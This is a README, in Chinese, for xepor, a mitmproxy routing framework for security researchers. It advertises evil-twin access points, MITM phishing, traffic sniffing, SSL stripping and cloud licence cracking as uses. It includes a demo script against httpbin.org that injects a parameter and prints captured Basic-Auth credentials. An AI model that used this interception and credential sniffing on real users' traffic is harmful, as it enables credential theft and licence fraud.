xepor

Xepor（發音為/ˈzɛfə/ , zephyr）是一個針對逆向工程師和安全研究人員的 Web 路由框架。它為駭客提供了類似 Flask 的 API，以人性化的編碼風格攔截和修改 HTTP 請求和/或 HTTP 回應。

該專案旨在與 mitmproxy 一起使用。使用者使用xepor編寫腳本，並使用mitmproxy -s your-script.py在mitmproxy 中執行腳本。

如果您想從 PoC 進入生產，從演示（例如 http-reply-from-proxy.py、http-trailers.py、http-stream-modify.py）到可以用 WiFi Pineapple 取出的東西，那麼Xepor 適合您！

1. 使用@api.route()編寫所有內容，就像 Flask 一樣！將所有內容寫在一個腳本中，不再使用if..else 。
2. 處理多個 URL 路由，甚至在一個InterceptedAPI實例中處理多個主機。
3. 對於每個路由，您可以選擇在連接到伺服器之前修改請求（甚至在沒有連接到上游的情況下返回假回應），或在轉發給使用者之前修改回應。
4. 黑名單模式或白名單模式。僅允許腳本中定義的 URL 端點連接到上游，使用 HTTP 404 阻止其他所有內容（在特定網域中）。
5. 由解析提供支援的人類可讀 URL 路徑定義和匹配
6. 主機重新映射。定義規則以從假主機重定向到真正的上游。支援正規表示式匹配。最適合 SSL 剝離和伺服器端許可證破解！
7. 加上 mitmproxy 的所有最好功能！完全支援所有操作模式（ mitmproxy / mitmweb + regular / transparent / socks5 / reverse:SPEC / upstream:SPEC ）。

1. 邪惡的 AP 和透過 MITM 進行的網路釣魚。
2. 透過 iptables + 透明代理嗅探來自目標裝置的流量，使用 xepor 即時修改有效負載。
3. 破解基於雲端的軟體許可證。請參閱 example/krisp/ 作為範例。
4. 用大約 100 行程式碼編寫一個複雜的網路爬蟲。請參閱範例/polyv_scrapper/ 作為範例。
5. ……還有更多。

該項目不提供 SSL 剝離。

pip install xepor

以 example/httpbin 中的腳本為例。

mitmweb -s example/httpbin/httpbin.py

將瀏覽器 HTTP 代理程式設定為http://127.0.0.1:8080 ，並透過 http://127.0.0.1:8081/ 存取 Web 介面。

從 http://httpbin.org/#/HTTP_Methods/get_get 傳送 GET 請求，然後您可以在 mitmweb 介面、瀏覽器開發工具或 Wireshark 中看到 Xepor 所做的修改。

httpbin.py做了兩件事。

1. 當使用者造訪http://httpbin.org/get時，在HTTP請求中註入查詢字串參數payload=evil_param 。
2. 當使用者造訪http://httpbin.org/basic-auth/xx/xx/（我們只是假裝不知道密碼）時，從HTTP請求中嗅探Authorization標頭並將密碼列印給攻擊者。

這正是 mitmproxy 一貫所做的，但程式碼是以xepor方式寫的。

 # https://github.com/xepor/xepor-examples/tree/main/httpbin/httpbin.py
from mitmproxy . http import HTTPFlow
from xepor import InterceptedAPI , RouteType


HOST_HTTPBIN = "httpbin.org"

api = InterceptedAPI ( HOST_HTTPBIN )


@ api . route ( "/get" )
def change_your_request ( flow : HTTPFlow ):
    """
    Modify URL query param.
    Test at:
    http://httpbin.org/#/HTTP_Methods/get_get
    """
    flow . request . query [ "payload" ] = "evil_param"


@ api . route ( "/basic-auth/{usr}/{pwd}" , rtype = RouteType . RESPONSE )
def capture_auth ( flow : HTTPFlow , usr = None , pwd = None ):
    """
    Sniffing password.
    Test at:
    http://httpbin.org/#/Auth/get_basic_auth__user___passwd_
    """
    print (
        f"auth @ { usr } + { pwd } :" ,
        f"Captured { 'successful' if flow . response . status_code < 300 else 'unsuccessful' } login:" ,
        flow . request . headers . get ( "Authorization" , "" ),
    )


addons = [ api ]